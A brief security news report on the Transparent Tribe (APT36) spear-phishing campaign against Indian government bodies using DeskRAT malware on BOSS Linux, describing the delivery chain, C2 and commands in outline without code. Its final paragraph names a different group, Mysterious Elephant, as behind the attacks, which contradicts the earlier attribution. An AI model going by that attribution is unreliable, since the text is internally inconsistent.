A threat actor with ties to Pakistan has been targeting Indian government entities through spear-phishing attacks to distribute a Golang-based malware called DeskRAT.
The activity, observed in August and September 2025 by Sekoia, has been associated with Transparent Tribe (also known as APT36), a state-sponsored hacking group active since at least 2013. The campaign builds upon a previous disclosure by CYFIRMA in August 2025.
The attack involves sending phishing emails with ZIP file attachments or links to archives hosted on legitimate cloud services like Google Drive. The ZIP file contains a malicious Desktop file that executes the main payload while displaying a decoy PDF in Mozilla Firefox.
The malware, targeting BOSS (Bharat Operating System Solutions) Linux systems, is capable of establishing command-and-control (C2) using WebSockets and supports various persistence methods.
DeskRAT supports five commands, including ping, heartbeat, browse_files, start_collection, and upload_execute for various malicious activities.
The malware’s C2 servers are referred to as stealth servers, and the campaign has now shifted to using dedicated staging servers instead of cloud storage platforms like Google Drive.
Further investigations by QiAnXin XLab revealed Windows and Linux variants of a backdoor known as StealthServer, indicating a cross-platform focus by the threat actor.
Recent campaigns by threat actors in South and East Asia have targeted various sectors with sophisticated malware and phishing techniques, highlighting the evolving threat landscape in the region.
The threat actor’s operations have become more sophisticated, using custom malware tools and showing technical expertise in developing advanced malware.
Mysterious Elephant, the group behind the attacks, poses a significant threat to government entities in the Asia-Pacific region, highlighting the need for enhanced cybersecurity measures.
